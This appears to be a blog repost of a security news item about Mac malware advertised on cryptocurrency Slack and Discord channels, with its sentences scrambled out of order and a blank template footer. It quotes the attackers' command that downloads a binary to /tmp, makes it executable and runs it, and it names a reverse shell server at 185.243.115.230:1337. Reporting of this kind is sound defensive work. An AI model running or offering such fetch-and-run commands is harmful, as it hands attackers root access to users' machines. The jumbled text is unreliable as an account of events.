![]() ![]() ![]() The "script" file then sets itself as a launch daemon to gain persistence between OS reboots and then creates a Python script that opens a reverse shell to a server located at 185.243.115.230:1337. script Malware creates backdoor on infected systems cd /tmp & curl -s curl $MALICIOUS_URL > script & chmod +x script &. ![]() The command (see below) downloaded a hefty 34 MB binary named "script" to the /tmp folder and then ran it as root. Verhoef says he spotted crooks, posing as admins, mods, or other key figures in the cryptocurrency world, posting messages that urged users to type a long command inside their Mac terminal, claiming to help with various problems. The malware's existence came to light last week when it was discovered by Remco Verhoef, an ISC SANS handler and founder of DutchSec. Security researchers have spotted a new Mac malware family that's currently being advertised on cryptocurrency-focused Slack and Discord channels. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |